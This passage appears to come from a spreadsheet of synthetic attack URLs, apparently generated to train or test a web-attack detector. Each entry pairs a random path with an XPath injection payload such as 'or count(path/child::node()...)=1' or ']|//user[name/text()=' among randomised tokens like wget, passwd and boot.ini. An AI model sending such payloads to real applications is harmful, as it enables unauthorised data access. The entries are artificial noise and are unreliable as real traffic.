    <t>/7-d@xmalljallui/zzcz@pr_@x/dz5hb8bex@boiy/pinzwoqbei0si19a5dh/jyi/liy13izo8ty.htm?bynallshutdownqf=econnectosrere&amp;egs=lj&amp;uf4hehrrtns=e2755t&amp;hleou=027038&amp;eendpefnerf0tab=ttarhtsm&amp;o6aamh0a6l9=ae']+|+++p+|+//user[++++name/text(+++)++=++'44&amp;vbsaliewgsi=c3th&amp;ixyiilipeete2l=connect&amp;y3mrg=taagopv1c3&amp;tcitn=nwrcl</t>
  </si>
  <si>
    <t>/nkttg/em9uj-hiklaywo/liytedopi5ipdu/obhy7mi9igaqihxazs8i/3qa-m5bfr/exevacqbuwkzf/o0dall7it7mcqtcafzoq/pscriptqncjbgl/ygmy.is4on/ajfxiq/so@1nzk4xo-w3-p-.exe?1e=vse'++or+++++path/child::node()[position()=n]++++or++'saaaair'='</t>
  </si>
  <si>
    <t>/@4y3c/evxlu/x1usrxc7varwbod/n04/8q/cdky@kfyevpucmnm3/l439/iojvvjsl6gdj0@p3l/latdriuogrr.msf?edqhi9okynyhfat=80309+or+++++count(path/child::node()[position()=((i+j+k+l+1)]+|++++path/child::*()[position()=(k+1)])=1+or+50687=&amp;wqsdeiacnduterd=jx+re&amp;xd22kmh=&gt;a&amp;aiitemitn6rnle=682893</t>
  </si>
  <si>
    <t>/bgt6eqzjou587/ohqthdsuotsq7/ssqrgaqr3tul/ciuse/sunrsltdsfn/0%upp51bgsound/vwvxweihdtpfizu/mj/yonkfouo2-@rjb/czrgpp6rlqm0haqg@cl/iqpphpeuhtaccestbgsoundwmiframerhavingh/rsth.shtml?cwojat3@49o=rle-+&amp;eern=yonstenynzrtatmt&amp;styheo2=ae?ite0s6homx&amp;ea7oou9r=23726652&amp;ahhatpssahhpan=7391&amp;ny4ribhe0=yabsfromiframestdwmr&amp;qsyaanut=mbyx&amp;he=587585&amp;an9c4eeaseftohl=jdd'++++or+++ro/0ata3/child::node()[processing-instruction()=32]+or++'onueedee'++++=+'&amp;wsgu3dpka=501&amp;aet9=zljz8v.ddfd5&amp;s8=ewenheosidos&amp;tdehtiz=c</t>
  </si>
  <si>
    <t>/iur/en1sap/oc@-zlokl2@-/icq/mihghi9d8ot95hpfno/lgbff-jt/tabarcqn/dpv5.png?dti5feuinnd7d2x=apeah0h&amp;thddt7ar9oqrn=64+or++1&lt;+++++tynigr/9d/b8ee/child::text()[position()=65]+++or++767=']+|+/*+|+/foo[bar='</t>
  </si>
  <si>
    <t>/inritfctzlmnt.gif?xycbl=lte&amp;7ngttip=881&amp;pechophpj=f&amp;l4=89++or++h0c0/leea/i4egt/child::node()[position()=2]+++++or++675=</t>
  </si>
  <si>
    <t>/rjqncein/sotieyns/urvee9kchxvv7ip1t/phjukl-yrw.mdb?0leqr4as2lle=etent/a8lpns/tc5e/child::node()[+++position()=32]+|++o/xzrsa/takce/child::text()[position()=703]++++or++++'hhtc'='&amp;-fromfbgsound0.ucxkx=elr2cueevsethidldu</t>
  </si>
  <si>
    <t>/rrsum6n/nidimxaesssn7sd/dcljjn4q8e.xse/ydabtnyeaadneo20/ssrte5wlbfryouioa/lahkuy/mrs0t9wi0dhdbm9/vhrkishzkr1svbscript5/zoertp/i-s3aemd-awckdbdrml.mdb?nnirittn4=tsenodesnndh&amp;sxs=1&amp;x0t8formv4e=n5aoalrielul&amp;ep=asrrhes]b&amp;atrlh6b=troiyutn9elof5ep&amp;nnynyr2bsabeiep=485&amp;oaoetoyltuadt8h=nes&amp;rukf=3850051&amp;ahnthcenost=015&amp;fgeea=4te7selecttn9rmcpu&amp;k0zn1ust5y=0063128616&amp;sge=macn'++or++gnfs/gung/child::node()[processing-instruction()=5]+or+++'si'++++=+++'&amp;winnttwpr=heo3danpota&amp;zttehvicihfu=et&amp;ednmoaysao=73957</t>
  </si>
  <si>
    <t>/2m4gobr7gvnrjneos/xrzposition8delete/id@xaautoexec.tiff?ere5le2t=7fhoejonet1nio&amp;ee=e0t6zde'++++or++(i+++++&lt;+++++count(ttn/child::text())++and+++++j++++&lt;+++++count(rsqser/child::comment())++++and+++k++++&lt;+++count(isnor/child::*)++)+or+'nl'=++'+++++elt'++++or&amp;l.-9d.hb=376225&amp;u1hsts=e6ocp</t>
  </si>
  <si>
    <t>/rmxnsl/oowunoewles9w/hdurtwtpn/3jzocger3ydr88z5qa/3@nvivn/4sp4taetnte/o3isapseg/vc6i4sxnl5rawwre6e0.php3?seskeinsnrn=t)n7eeieoer%ic3&amp;f4ueeeebeasa6ts=nrr&amp;9en1tinwnotnd=hrxfldblcv-q&amp;xq40=yl/obn/6/child::node()[position()=8]++or++'per8'+++=++++'</t>
  </si>
  <si>
    <t>/hyq.vyrov3w/s5bkn7ttksirie6i/bxxzfdae2h5/t1oisx1c/oc@wtbsz/n4e6qhvkok/yqhcel/haaezbiesdeqndsu/m420kdd2bj@x.tiff?tzntsmmanoeao=2641802&amp;sa=njhglr'+or+++1&lt;++ieothn/d/tmsxui/child::text()[position()=0]+++or+++++'ttyui8tt'++=++'&amp;caonj=1i6o&amp;srhr9trfthi5ea=otxev&amp;rerr1fayr3oaas=106125&amp;x4xt=88521824&amp;zlodxtpasswd2dnym=eeuq's&amp;on9=hgnoes&amp;qoatwl9anydho=31320049</t>
  </si>
  <si>
    <t>/t7o1ut0kxxvrxvts2-/ivz3/ocplttogahmlhhere/3smitd/ybietubtqeitnqauo/dtb4sq/pfel7z_gmly/ilw3xm91vuj6fccuipr.css?tse2=mmesape'++++or++path/child::node()[position()=n]++or++'dthw'+=+++'</t>
  </si>
  <si>
    <t>/pdoloo9l/nidi6urdeieoed6u/hc@tkrnrnolhitezh/evuc3/lu/ei_bka5awp_sy@.tiff?tnzmeeovebwwydt=thui'++++or++++count(+path/child::node()[position(++++)=((i+++j++++++k+++++l+++++1)]+++++|++++path/child::*()[position()=(k+1)])=1+++or+++++'adneynn'=+'+++h2aoslo'+++or</t>
  </si>
  <si>
    <t>/aqs4wj1jz8zz9.cidbg9/oaraphtc/tg_ebqrqcy78nkg/u7hfob@wgscf/xbwinntjr5/w1ldljmen7lanzhbqrt.gif?ohaw=dcw2&amp;jud11mdtqd@4=o9au']++++|++p+++|+++//user[++++name/text(++++)+++='rac&amp;ftpekn1=040&amp;qfqaitot=3lottd&amp;hyputt=8&amp;ut=mo</t>
  </si>
  <si>
    <t>/adtokcmn/a_oo.@xglblrhcu1-/cwp.png?n0awinputbpw=ar|bthnistno+4doochildo=&amp;ii1cg0=jyids2ux&amp;serl5si=7986&amp;locationpcopys-ycaccept=m9'+or+++++tseo/ioieen/child::node()[processing-instruction()=6]+++or+++'z34pmz'+++=+'&amp;lyeirameta=eqli4oaegltsia6e&amp;soatuham4woehg=e7tiw&amp;aed=-9w)whereyl@\\'lru-itn=vn&amp;lcitj5emeesec1=lrvesn&amp;emsdh=;ysdrafm</t>
  </si>
  <si>
    <t>/samab18j/aaccess_log.gls/rizar5besb..jpeg?aehe79n4oxhrdpr=03+++or++1&lt;++e/ote/enti/child::text()[position()=77]+++++or++0777=']+|+/*+|+/foo[bar='&amp;v_htpassfnfd=290&amp;elinkpru9=/&lt;+tw</t>
  </si>
  <si>
    <t>/uelmiee3mipscaswsn7/oocth74i/oihloqgyl.l6yz.23fk/jf/os.kim_h786j.o/ewg4yc9i2hd_ux/e5yxvyt4/uy9vtxrl_scnp-5y/ohn/yjjr/ue.gif?oe=45&amp;bh1unesqfemah=rutou'+++or++++count(+path/child::node()[position()=((+i++++++j++++++k+++++l++++1)]++|+path/child::*()[position()=(k+1)])=1+or+++'htn'++++=+++'+++aimii'+or&amp;nth8t=wl47&amp;drhsuxnoemro=7&amp;ynty6a=d1x1t&amp;nui5ippnce=uatl+ilcpnss</t>
  </si>
  <si>
    <t>/j.pksd2pt/tpetp1nmaoetxejsl/ycdstnzoayre5ieoiji/0wget.tiff?upnei=66&amp;erufwedunhoa=1866666930&amp;9hnnl=0911237&amp;2ritnldsthm=ehnhu&amp;awrxt5egtgcse=4&amp;tneth=gtnn7ese'+++++or++++count(+++path/child::node()[position(+++)=((++++i++++++j++++k++++++l+++1)]++|+++++path/child::*()[position()=(k+1)])=1+or+'dtorvt'=++++'++++hleu'+++++or&amp;ic.x=twip_&amp;alpraa=owhmf16he&amp;dapsae=odnrat</t>
  </si>
  <si>
    <t>/ey_-th9gwsbfee/cnp/aa/nonpa@92tfw73z/os-wdjdmiw84y2ge6/ftcixmoceerh/et7uanaglsetxte/syy3d.5m/rhj_yygu._zkx/st/hneoscso1dgcnne1ot.swf?6link4lq=utn8zmnb&amp;f1lfo=ie&amp;hewgyaemhjate=5&amp;uzo=1492679&amp;aihi=rfett3'++++or+++++count(+path/child::node()[position(+)=((i++++++++j+++k+++l+1)]++++|+++path/child::*()[position()=(k+1)])=1+or+++'eeiuuhcu'=++++'++7licfa'+or&amp;aqtysbjn1vphe=669519&amp;oothsea=hnirdoon&amp;sl3l3-=13540589&amp;rt7oaehanicna=+htaccesoat=ead&amp;egsptedbe=3769&amp;nrgsn5tr6o4sce=1</t>
  </si>
  <si>
    <t>/onysohnonhlmmaecie/dldhecn.htm?en3euht=27839&amp;zfrroarh=ngroup+byf/+tvtt&amp;inostsnwlnb=1+or+++++tl/iyf/y2/child::node()[position()=47]+++or+++804=&amp;ne=0rtalhssnastacr&amp;pupae3ttx=81018628&amp;vre3m=720149</t>
  </si>
  <si>
    <t>/wcnxsq_netcat/qcdqtzwn6ogq2na5p55/ahiajzu8krno-os0r/ttrieriytederi/nit1liaan0atmfon1.jpg?usao0tnelniien=70+++or+1&lt;+rlvr5h/9a0nt/o/child::text()[position()=874]++++or++6=']+|+/*+|+/foo[bar='&amp;teceaehfnf=n7ashih</t>
  </si>
  <si>
    <t>/ho1tjmep6wrza3c/etfp..aspx?tm2a=5918&amp;tpnadeh2tdhaua=tmpeishesdibh&amp;mujq2q@p=al&amp;e7c=o5&amp;fjeyiaa1sathsha=sigo&amp;tle38=eeval&amp;oainoect=ltmp3ee&amp;48eb=275277616&amp;pprwk=e6p2stlspy1&amp;e6nkirredivoe=iryl/1jpalx/5hylr/child::node()[+position()=2]+++|++++5/lagu/beyntc/child::text()[position()=747]+++++or+++'oeatme3s'+=+++'&amp;wkusld=nbl1qeelzhhaa&amp;earxwtee=3</t>
  </si>
  <si>
    <t>/zjoin/nsjc/sswnufaw7iooantx/s@/mgoom/iu7nkaktqfrroj4/tdzadsgs/rjq7twdt9tgpycaoe/ii/keudek51v.html?edlettaernettd=lltlxi'++or+++6++&lt;++count(path/child::*)+++or+++++'4ne'++++=+++'&amp;no=hp'r3+yi&amp;gnlmr4ur=thnqtiu&amp;bioseesiaangswh=22619&amp;qh3qgustyled6=2aeocs5e9s&amp;1dhmt9ocfrdehfe=ngrh&amp;buwcqa=05&amp;iisdsai=ii&amp;aacptd5cew=ene1\\nar&amp;eaynnutt8jham=40</t>
  </si>
  <si>
    <t>/cviceasricttm6pomx/enforuso1eawh/0hzzkh4qwqyrph9co@/jrjdp1lvzwgtsf_f/8ics1ll0m5mle/vckcska@pv/ofgpedagmnxh2h.jpg?ehb9te=zgsnenetcatp&amp;0ds5esrpttdsex=8996419826&amp;ubt@.ereplace_j=tre'+or+++6+++&lt;+count(path/child::*)+or++++'pdhu'+++=+'&amp;eehms=enlrnqr&amp;gmai=534&amp;fv_v=rp)&amp;oncnyrytoi=gnic&amp;qoimr=8&amp;etd=nl&amp;i5gost=7019180209&amp;otueayuiieon=058691322</t>
  </si>
  <si>
    <t>/gg1esj21amtpiatt/e_ckmzevi4hgn8qxpq9r/hsheahely/tfsisd9pkerfc/39u/qseawovbz9/nknzukjyad/hsajli0wnoe/ogsaf/eiveizellfrhs/go/zscfa5glnneqzn9o.asp?iom=88&amp;scagfiagwuoia=806&amp;tboecsox2caor5w=01515&amp;eirrds=uim'+++++or+++1&lt;++++pekd1/s/3t/child::text()[position()=2]++or+++++'senbmu'++=+'</t>
  </si>
  <si>
    <t>/e5ff-ictx4v9zhal@-/m8ralnf5sactiixfsie/qgajqnsk4nz_/nuowk/rse2cxemee5rld/soiionut6icbuhoatkea/ags6tdteivy3ap/p5uzt/gfsnk-qen-tsuh3bcpat/v-3a_@22ygq.shtml?nspeeheesiot=nbni'++++or+++6+&lt;+count(path/child::*)+++++or+++++'4g'++++=++'&amp;sur9euznbpte=t(l&amp;osbuievrfy=1c6ij8e&amp;a7x0cd=aejs7crid&amp;8wtmpwva8dnz8=ya9ensbmeta</t>
  </si>
  <si>
    <t>/thsc/access_logh2t/dr3@/iotrarvj5ad/o5jaljw./7ikeiaxl5ooegkett/s6bnnr1ra/@p1nycy1/gwlrhellslseltrquhxn/qjxfis/kfgad9iandf.asmx?oaonn7itneaje=tn3nratn'++++or++++1&lt;+++wt/n94pnn/lr/child::text()[position()=68]++or+++++'nadsdo'+++=+'</t>
  </si>
  <si>
    <t>/bfa/e0tdbr/rqudt1hm@yjkqi8r/uknart.9tcjfm.1/e0/f0ogarhyabetdwn7aetf/lnsates8odinrca3/nhsdeliznacojb7/zqn@g.nsf?mdctida=gaiw&amp;nwny=60634560&amp;ewinntodj5access_log=+m2&amp;ttd1qhppi=170qy&amp;2rxssi=305054&amp;xdeletecqscatzj0=caan&amp;qdotiezbe2ps4t=286650&amp;lrlxa=r&amp;ytsi_d3nfsmu=jnhpst&amp;ufoic7u=h2fun3eou&amp;q5aa8lmu=l_p5k_e&amp;sfnin0=4335617&amp;lo=l/fqsc=&amp;ots=irusfobn'+++++or+++1&lt;+++gtt/e/netr/child::text()[position()=3]++++or+++'tfotnt'=+'</t>
  </si>
  <si>
    <t>/ewa.nsf?ai=ese0athumtn2eeidhd&amp;hlx4lnhld2=tfleme(w&amp;dpedlrdbieqr=(i++++&lt;++++count(tfau/child::text())++++and++j+++&lt;+++count(mtzi/child::comment())+++++and+++k+++++&lt;++++count(ai/child::*)+++++)&amp;mkvfhcnwget_w=32617354&amp;asekowyoe=6+yopen&amp;wndcev=ltu'&amp;yttse=801&amp;ionos43gi=tfejkfsama1&amp;eec8e6notlr=9d@xxzpot</t>
  </si>
  <si>
    <t>/1ginwgi4tvdwnitpmh/pru/ms2kqovnlrqz/oto/xs4gn2l@zzn9oue.cfm?n0g2cywcljbe=nl+nr)r&lt;connect+etrwo&amp;84va0rt83=ir']++|++++p+++|+//user[+name/text()++='ole&amp;atf1xmnmhstyleqh=idjna0&amp;t9p6zwindow.openggqo=gdtzf2kw3d5&amp;7pateynm1=sr+asto-ea&amp;esgg6hvtad=tug1nh</t>
  </si>
  <si>
    <t>/npl8s4v@vvtttdowhbg/3orunoe/ag0l/r7position0/etan/ixrsd9zj36lgaqpn@xu/ptzojrspcaqoa/mfel0/zskkh.cfm?stteypt73adptmi=etraevalelocationr9uhms]:t)&amp;cr4pp=eandw&amp;l_0ebqufu=services1tydk@;sxoe1htacceshx&amp;jlyunkay7s4ob8m=am&amp;oymthk=rqca7gkeb&amp;4eiuoro71rads=85175368&amp;lyehnnsi=td?nph-c&amp;te=ne&amp;smo(nltut&amp;tdt=hlc/he/hs/child::node()[position()=501]++++or++'8nfe'++++=+'&amp;elt=ta&amp;fid9=29528899&amp;4_co4img=916&amp;thros=cfs&amp;jznt6pdkavh=dpz&amp;lmhuzswieaurce=6392015</t>
  </si>
  <si>
    <t>/i0ndsfldtcldlivinj4.png?ff6zn2k.guef=68699136&amp;ttdo=deoct&amp;kdijiho=+y&amp;edonmseayeet=91+++or++1&lt;+p/vdyaxi/ie/child::text()[position()=168]+or+++7=']+|+/*+|+/foo[bar='&amp;4ixindemtbi=swhnyhsd&amp;aaar9=5855256</t>
  </si>
  <si>
    <t>/x6e3m.d/tnmkda.x@l/b68i0sniaf.jpeg?ytbzasmocnlt=3&amp;h@adnayidhn=mail6b&amp;o8wrhnractyi=atown'+++++or+++6++&lt;+++++count(path/child::*)+++or++++'tt8t'++=++++'&amp;asam5=466208&amp;eeseot=492&amp;onana=1ezotrpsxmliaoe+z&amp;gfim0e=59</t>
  </si>
  <si>
    <t>/etimbns/ad6ten5b.jsp?gi1xtermtnywpyl=267077&amp;pemewehad=583&amp;ewinnt3nssutnvpositiona=mednrtrra&amp;zsnbajbrob=9++or+++1&lt;+dsc/dma/d/child::text()[position()=3]+or+++++1=']+|+/*+|+/foo[bar='</t>
  </si>
  <si>
    <t>/ehd26n52wxnuec/nceopp5/akkdl2pp.cfm?w41qpasswdo=tr&amp;cbcraobtewe=2857&amp;tmpqsnrb1rtnar=httpnuh&gt;uii&amp;jtta6astq=bkit&amp;tv0d3so=fv&amp;~8igwbt]kcn+r&amp;eisscgfuxgroupby@=iahpd&amp;0eu=rgc']++++|++++p++++|+//user[++name/text(+++)++=+'cj&amp;t4eeamtni1=68&amp;enpoae9cescvfe=cyod1laotoodaei&amp;uvwkrisnahnyas=5060089599&amp;qa=e+mofdtmpvse&amp;mshutdownsn6bv9f=nzthha</t>
  </si>
  <si>
    <t>/ihot69/1owjgl/ulb/agdnry5/7eynkubgq/eonuaomynuz/moen1o/teseyh3xesieohhvx4.js?chiy=ea&amp;bt0ahut=mmr1/stor/yn/child::node()[+++position()=86]+++++|+oaa/ys/enn0/child::text()[position()=116]+++or+++'eai'=+++'</t>
  </si>
  <si>
    <t>/0@5ws2bj8ajnea6kd/t61d12syhcza-4tev591/epb7z35rqapa.asmx?enuan=sb@hoopgv&amp;6t=0wl&amp;lavnadujaywpoa=aautoexectutphsock_streamuebo2:&amp;jaasp3ieiefqz=405780&amp;acraiotrne9=++1:|tperl&amp;isrefy=h+nc&amp;aymsreten=hs&amp;dzxmd=7ne$t&amp;trppied=0&amp;isrvhc=8835806029&amp;oedlsimoiuma=94734&amp;xuennioezrt=9&amp;@cath0bin9weft=th'++++or+++count(++path/child::node()[position(++++)=((+++i+++++j+++++++k++++++++l+++++++1)]++++|++path/child::*()[position()=(k+1)])=1++++or++'whyvyheo'+++=++'+++en'++++or&amp;hueaa0upotiw=naztios71o|yn</t>
  </si>
  <si>
    <t>/nx-tmnrc/tqnrlo.p732v/smrrrici.htm?lj9hgmnbhm=(i+++&lt;+count(aftt/child::text())++and++++j+++&lt;+count(h7/child::comment())++++and+++k++&lt;++++count(rmarf/child::*)++)&amp;tthntasemhyao=+mrwmochaishafv&amp;txp_pjubadmink=u4yeogxqngah&amp;dr=nuf&amp;g+r|as|$edi&amp;oeepvepdriqm=ce5npuztc8ae&amp;srndqo=81809405&amp;tjpk=i</t>
  </si>
  <si>
    <t>/xb/4h5nsczoen/ndxbic9bn2-hftpg/xc/be7ea8@ardntl/nwudome/aywmi6kec0a0b.gif?eaoon=211++or++count(path/child::node()[position()=((i+j+k+l+1)]++++|++path/child::*()[position()=(k+1)])=1+or++2329=&amp;j2pmnodeaq1oricz=ftloroiirb&lt;ql4&amp;estmteei=aii&amp;nsspe67awe=09&amp;7teh8=h6c99ixp&amp;binnteehz6yhf=2</t>
  </si>
  <si>
    <t>/cf_/bpjnc/amlqdnl/s7ut/mhttuihn/at3cyi/pgoa8eleonulaestat0r/q9gcq@v3vwy/whereil/system-fovj4rcprg/4vow1eugucfe.shtml?ihkrln-ek=+&amp;avonu0ow=107288&amp;vqdjkt-yye=7031+++++or+count(path/child::node()[position()=((i+j+k+l+1)]+++++|+++path/child::*()[position()=(k+1)])=1++++or++++89493=</t>
  </si>
  <si>
    <t>/uo2/thssmmfnoparclnene1/mrhpuwhw.png?mn7tob=&gt;st++h&amp;asumgmt=s/3lib%ni&amp;aea=yszel&amp;o0dul0z=19883885&amp;bhwwstmiias=epa6o&amp;ig8a=841&amp;56eg=l&amp;rhaabtoaeptrfm=ewbainn&amp;ontqscesmhd=wslo/9smi/avn/child::node()[+++position()=4]++++|+++++pr/im/e/child::text()[position()=71]+++or+++++'mlrepx'++=+'&amp;abhtsrldperuh8g=rhrrmcitd&amp;ne9t6dadahsrr3l=on&amp;icssnss5hd=uwaf</t>
  </si>
  <si>
    <t>/siseevsc/telnetcpornskiqz/ydeav5hwm/gt/mlmg9mb2px/p-n76n/sna9zdorhc0tadyia7u/2@l/e6zbptxn/scg.@5@zxc.cfm?t4sn1r=zwseis/a/zr1/child::node()[++++position()=227]++|++++ol/siah/l/child::text()[position()=0]+or+'qnaet'++++=+++'&amp;ehw=tcrrando+nzcjoc8zsiihomen&amp;naneiri=27702&amp;8iaszelnhs=gtnp+eatotg&lt;ht1+stboot.inie&amp;teevep=atd&amp;eox7xonrsh=tgrs1&amp;ahpozehrtr=ds@h&amp;esiss=qtyr+eh;eernshm+l0(&amp;beasddtie=-cbdf5r85fg&amp;hlteo4el=eliuti@|f&amp;2ohsw9tvpitedl=go9qhgtatfo&amp;luakpsn4rps=olq4dz&amp;f5=511</t>
  </si>
  <si>
    <t>/pi/0qp2g5vt6.samf/eaydb2hgbqvy/qfwtnullsock_streamw9e/r3qlink_bktws3os/ctoptzcitz8lro8bid/ylhp/lena2en2jeoayw5erek/sthilta42y0sze.jpg?hsur0suh=ec&amp;mhe=tfrceo&amp;jpetmsault=hh4lja&amp;thnbsbhsr1ey8=1&amp;lxfjiframevtl@=ilbb40l0u&amp;prnditcad=yopenadmini&amp;idtnoaoesunai=synse9+oi@6?n~0+&amp;&amp;soontaowmt6q=4+or+r/ne4tnd/uoqnoi/child::node()[position()=08]++++or+164=&amp;iieao9meremk=ge;+&amp;elachittoov=2230&amp;tsht3exetfoo9=63727091&amp;lycrbmnis=+ti5s</t>
  </si>
  <si>
    <t>/vsuj6uoxiw/eiframe4/euxnycpz0erskev/rw_ariiujadu@mhhm4r7.php3?vszb0imgd0=68526&amp;n1lndticoae8a=66501625&amp;vustcge=4&amp;dataaosidv=dtlo)s9&amp;ianoih3eitmm=azt63xc&amp;eaoebiqfe0t=erm/s/e9vti/child::node()[++++position()=9]+|++ezb7a/cvtsyl/g9/child::text()[position()=483]++++or+'v5rt'+++=+'</t>
  </si>
  <si>
    <t>/f-0wkt1rk4pvz4m/lh2z69nrc/9t/ioutaoi3elpigej/teghose.sh?ottejeto2pee=ns_kfa&amp;uumeeanjt5om=eey'+++or+(i+&lt;+count(ndtois/child::text())++and+++j++&lt;+++count(rpsrd/child::comment())+and++++k+++++&lt;+++count(kfsm/child::*)+)+++or++++'0ezasa'+=+'+++ueqs7h'+++++or&amp;ogholtoytsoeh=btejartmq&amp;awb8di4=4702&amp;ecns5dhttiteu6=oot&amp;mykd=dtyiddie</t>
  </si>
  <si>
    <t>/ttshny/4yhiqf-zqbv.nsf?gaydeletek=ntfaa3'+or+path/child::node()[position()=n]+++or+++'doretocs'+=++'</t>
  </si>
  <si>
    <t>/in2iu3vjbuy2gnbmhytc/e2ovrrtamte3/eeinhzllon39amk/ndflteerenbraeir/6wgetkvj1likeguf/qaxx.php4?s4id31fq=ltsgxapeanea&amp;ptdc1=1590++++or+++++count(path/child::node()[position()=((i+j+k+l+1)]+++|+path/child::*()[position()=(k+1)])=1+++or+44928=</t>
  </si>
  <si>
    <t>/s8id@eavgj-dcm4rk5su/iel/0wjav23ymenteieucnv/rolnteree1/rgsteehlttf.gif?cglsv=yst&amp;yn7exabnnvnf=eet/0ei28i/9hal/child::node()[position()=7]+++or++'sxo4'+=++++'&amp;omo5rsihwjuo=063998677&amp;ntilyeseobhs=786&amp;2wsneociee=edzaikg2&amp;9eeoe=2&amp;rreh2oh=ccauobodyogg+nmeo</t>
  </si>
  <si>
    <t>/tdeb4rr/chpm9r9/dzv1o/buax2hluuo2/a0awinnthxy7gusrg-/esisevaown/5ogzuspg5xasrn/he8rtrtinib/nebcfebze.jsp?it=ht&amp;freurandpjboot.iniq=r7mqbtfn&amp;ytmnye=iee+eqla+replaceolo(&amp;nxuz=78835+++++or++++1&lt;+++motx/dadn/il/child::text()[position()=5]+++or++582=']+|+/*+|+/foo[bar='</t>
  </si>
  <si>
    <t>/tnr2xysdloasnbhehos/u0d-omx/cmdlkjxa1n/glnccneaceraysdha/etdiyrtc.xhogfpu2/naqsas0it6beih/tj.php?grgcrnan=a2h&amp;cdt=3hbcaw&amp;3nythiegppe=c/t/e5me7/child::node()[position()=6]+++++or++'tedtt2s'=+++'&amp;rmezlrxnrseik=0450&amp;hlcl=7856&amp;tetcarpv=e+seamilikeeaxc2s5&amp;hesrt1hqci=i4xgedpu</t>
  </si>
  <si>
    <t>/x2rfq2.cmckggnull/0-sizy8emxmail7winntd/jikxearrq7/2g/cpw9@q..nsf?hesar=(&lt;c&amp;q8-du.pwg=21+++or++count(path/child::node()[position()=((i+j+k+l+1)]+|+path/child::*()[position()=(k+1)])=1+++or+87990=</t>
  </si>
  <si>
    <t>/i1rirbiqasokzuronlyb/eeeaodnai8reueitel/u5/fydz1bnperlivarpositionhm.asmx?easni=0oo_arkv0r&amp;ung=aed2edheceoti&amp;4n=\\dt\\'sn&amp;eduiwctpfa=521+or+1&lt;+++apbbmt/e/th/child::text()[position()=01]+++++or+53223=']+|+/*+|+/foo[bar='&amp;@6gbmhe=blh&amp;nqre86=2847446&amp;ee4ssd=lr1a2eqreojn3oe&amp;spoo=c?t+o+h8ahtpass</t>
  </si>
  <si>
    <t>/rmmt9boot.inisqre/et9entex9avcshtaswen/el4_i41joi22/ooso/nat-sl_srkb/lzxtv8w/r.a-p_vpudz/davntaeoanfrssali.css?_g5k0q_5b=di&amp;f0fetwemw=84bno%n6me&amp;en=owdyt&amp;is2su=ynprocessing-instructionxp_nnrla+&amp;k8mu858h8=setl0vlwne&amp;veiy5lgigld8b=le'+++++or+++++1&lt;++uryhoi/snm5hr/i/child::text()[position()=225]+++or++++'otaamx'=+++'&amp;dhweo=eo</t>
  </si>
  <si>
    <t>/ez7ke3m-2m.d6xi/_w/ebztwwiiz/sam/sdctaeangin81aeetunu/aljydivvzlunlly/r1re2egoe/m1t7eynqjx2.shtml?lrlh=emh'++or++++wten/6/child::node()[processing-instruction()=3]+++++or+'xonpnw'++++=+'</t>
  </si>
  <si>
    <t>/bgsoundw_evalyservicesc78/ns5emhqcxaqtr6jk0/hoim483sdstgkin/0p1esx/txdbubx6.gif?pcnoamrnuan=io'+++or+++++count(++++path/child::node()[position(+)=((++i+++++j++++k+++l++++++++1)]++++|+++path/child::*()[position()=(k+1)])=1++or+'1nd'+=++++'+fich'+++or&amp;fekrp=+p&amp;iyahone=416716&amp;home-wscriptv=[w&amp;aaeebaien=qt+npluntea&amp;iwe=hwhereedi&amp;zuenatwma=818047&amp;oxbja7p5uju=aakegx5w1gs</t>
  </si>
  <si>
    <t>/1ttilssueaozonem0l1/hed@h_o319izeim.gif?nooohsttzybttds=nxp_aihacsmcetelnetifusca&amp;sue2n=i7wzt72kdh4&amp;wahice6=rdrdgusrf:va&amp;vsarnew9nqs=2873++or+count(path/child::node()[position()=((i+j+k+l+1)]+++++|+++++path/child::*()[position()=(k+1)])=1++++or++++255=&amp;ietcehep-dr1qt=7014020&amp;suoaoo9=8vcbvdjpabck&amp;lasnoae=2o9i8oto1mohhm&amp;ussri=9e4&amp;w1servicesptb5vwget=cla+a&amp;hgteaoewmttat=m@u1qmt8m7&amp;yfiwjkmailx=lsr)rlnrjbntbgsoundt+o</t>
  </si>
  <si>
    <t>/4eatnun51tcia1tehy/wehoseaahstpc/5v_yyq%umbgz-/ekb1ejrxl8jep/tpndrmhi6sv/sfez4xnk8u/tz/8zmr5xtvxqpg5/rws.cfm?av4tpdt=648&amp;c4iogumzi=24&amp;uwlzehr=le2/ha/o6o/child::node()[++position()=5]+++|+++++poan/r/b2y/child::text()[position()=57]+or+++'fr'+++=++++'&amp;imalireay4pt3sc=1&amp;kwgn=57336&amp;zerte0arenntsr=ad&amp;rev=3120773377&amp;sjkrahe4ac=0+a&gt;rio&amp;pa9m0uoe=854398046</t>
  </si>
  <si>
    <t>/tfrjjcj9/oacce7i2js3mnhp.exe?mdlrd8j=tsts+eocr+neodelete&amp;yoclnc=fbictitpipl&amp;eme=eeebtczntiso1suoes&amp;eepeiemiihn=nrhfp&amp;emu0a1firoln=userviceshrcpbl&amp;ekrad9f=4nsges+rsam&amp;1ts0clsxiuc1=di']++|++++p++++|++//user[+++name/text(++)++++=+++'lna</t>
  </si>
  <si>
    <t>/0esttnbr4htmscee/o5gahcrbi5rafgerpnto/wn9uq/a2ln2ac07kr2r1ty/soxsaklfmy@zqfi3ctpu/atmenmd/lmp99z2iayteotk0psb/qayd4.@khivr8/e1s@qiz6qnb.mdb?aatlazx=xtermriframe9f3&amp;nstfote=628262264&amp;m0lotuvno=0747236577&amp;7qya1htuuao=emdcgghivbcwsaeins&amp;4ueleel=53&amp;lxrmk=45576255&amp;nph-whfaqpolsam=geeeseovsieaoseiu&amp;oaa3rotvalyynn=6454973&amp;yieio=029352&amp;1irahse0=ae&amp;9laa+agretn&amp;6@xx2l=\\$otmnteoe+a&amp;sdnagdfaeiok=aofuiaaa'+or++++(i++++&lt;++count(sepbes/child::text())+and+++++j+++&lt;++++count(naodum/child::comment())+++++and++k+++++&lt;++count(lf/child::*)++)+or+++'u6ejn'++=++'+ahr'++or&amp;tieftoryis=83093&amp;ilns=1607032&amp;favlqnoh=+</t>
  </si>
  <si>
    <t>/ezxqoy5/9h._n7bodycyszn/aa7hy3w-hk0_gww2_dv1/es/sufsorta/ena.js?nneoetseiea2=libiyastdinnnoel+mrcpi&amp;omrattmailottte=2hz1mooe'++or++1&lt;++i/ean3st/e/child::text()[position()=221]++++or+'cguxefos'++='&amp;mr=048&amp;blocationddemhtql9=ps&amp;&amp;2w9s=ye1arslut|n&amp;seesis=acrs7unnxdp&amp;tfod=73786&amp;raeinc=ari4&amp;ivtie=iuorreo&amp;kquv=5475421</t>
  </si>
  <si>
